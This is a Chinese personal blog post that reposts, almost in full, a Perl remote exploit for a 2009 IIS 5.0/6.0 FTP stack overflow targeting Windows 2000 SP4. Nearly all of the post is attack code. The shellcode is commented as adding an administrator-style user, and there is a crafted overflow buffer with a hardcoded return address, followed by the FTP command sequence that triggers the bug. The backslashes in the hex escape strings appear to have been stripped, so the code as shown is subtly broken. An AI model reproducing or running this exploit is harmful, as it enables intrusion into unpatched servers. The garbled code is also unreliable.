夜火博客 个人的碎碎念收集箱

Microsoft IIS 5.0/6.0 FTP 服务远程堆栈溢出漏洞利用工具Exploit (win2k)

这2天exploit又起来了,先来个Microsoft IIS 5.0/6.0 FTP 服务远程堆栈溢出漏洞利用工具Exploit (win2k)

Microsoft IIS 5.0/6.0 FTP 服务远程堆栈溢出漏洞利用工具Exploit (win2k) 代码:

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8

use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "x89xe2xdaxdexd9x72xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x43x30" .
"x43x30x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55" .
"x42x58x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4b" .
"x51x4fx51x30x43x31x4ax4bx47x39x4cx4bx47x44" .
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" .
"x4cx44x49x50x44x34x43x37x49x51x49x5ax44x4d" .
"x43x31x49x52x4ax4bx4cx34x47x4bx51x44x46x44" .
"x43x34x43x45x4ax45x4cx4bx51x4fx51x34x43x31" .
"x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51" .
"x4ax4bx4bx39x51x4cx46x44x44x44x48x43x51x4f" .
"x46x51x4cx36x43x50x50x56x45x34x4cx4bx50x46" .
"x50x30x4cx4bx47x30x44x4cx4cx4bx42x50x45x4c" .
"x4ex4dx4cx4bx42x48x45x58x4dx59x4ax58x4cx43" .
"x49x50x43x5ax46x30x43x58x4cx30x4cx4ax44x44" .
"x51x4fx43x58x4ax38x4bx4ex4dx5ax44x4ex50x57" .
"x4bx4fx4ax47x42x43x42x4dx45x34x46x4ex42x45" .
"x44x38x43x55x47x50x46x4fx45x33x47x50x42x4e" .
"x42x45x43x44x51x30x44x35x44x33x45x35x44x32" .
"x51x30x43x47x43x59x42x4ex42x4fx43x47x42x4e" .
"x51x30x42x4ex44x37x42x4fx42x4ex45x39x43x47" .
"x47x50x46x4fx51x51x50x44x47x34x51x30x46x46" .
"x51x36x51x30x42x4ex42x45x44x34x51x30x42x4c" .
"x42x4fx43x53x45x31x42x4cx42x47x43x42x42x4f" .
"x43x45x42x50x47x50x47x31x42x44x42x4dx45x39" .
"x42x4ex42x49x42x53x43x44x43x42x45x31x44x34" .
"x42x4fx43x42x43x43x47x50x42x57x45x39x42x4e" .
"x42x4fx42x57x42x4ex47x50x46x4fx47x31x51x54" .
"x51x54x43x30x41x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2 ";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip> ";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "x7ExF1xFAx7F";
#$retaddr = "ZZZZ";
$retaddr = "x9BxB1xF4x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="xB8x55x55x52x55x35x55x55x55x55x40x81x38x53"
   ."x45x58x59x75xF7x40x40x40x40xFFxFFxE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."xE9x63xFExFFxFFxFFxFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous ";
$x = <$sock>;
print $x;
print $sock "PASS anonymous ";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port ";
$x = <$sock>;
print $x;
print $sock "SITE $v "; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port ";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c ";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . " ";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/ ";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $! " unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
#
milw0rm.com [2009-08-31]

留言列表
Kevin
Kevin 什么语言啊  回复
发表评论
来宾的头像